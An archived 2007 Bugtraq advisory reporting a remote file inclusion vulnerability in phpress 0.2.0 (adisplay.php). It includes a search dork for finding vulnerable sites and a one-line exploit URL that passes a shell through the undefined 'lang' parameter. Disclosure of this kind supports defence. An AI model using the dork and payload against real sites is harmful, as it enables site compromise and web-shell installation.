[<prev] [next>] [day] [month] [year] [list]
Message-Id: <E9035D76-D7FF-48FD-8BCC-96ECED750E4C@gmail.com>
Date: Thu, 23 Aug 2007 01:28:12 +0200
From: naxx <cerbelum@...il.com>
To: bugtraq@...urityfocus.com
Subject: phpress 0.2.0 (adisplay.php) Remote File Inclusion
:::::::::::::::::::::::::::::::::::::::::::::::::::.....................
..
::| \ | (_) | \ | | / ____|
::| \| |_ ___ ___ | \| | __ _ _ __ ___ ___ | | _ __
_____ __
::| . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | | | '__/ _ \
\ /\ / /
::| |\ | | (_| __/ | |\ | (_| | | | | | | __/ | |____| | | __/\
V V /
::|_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___| \_____|_| \___|
\_/\_/
:::::::::::::::::::::::::::::We got the nicest name in the security
scene!
::::::::Info::.
::Script: phpress
::Version: 0.2.0
::Homepage:http://sourceforge.net/projects/phpress/
::
:::::::::Details::.
::Type: Remote_File_Inclusion
::Dork: allinurl:/phpress/
::Exploit: http://host/phpress/adisplay.php?lang=shell
::
::
::Variable lang is not defined
::
::::::::::::::::::::::::::::::::.
:::::::::::Additional_Information::.
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
::Contact: cerbelum@...il.com
::Website: none yet
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
Powered by blists - more mailing lists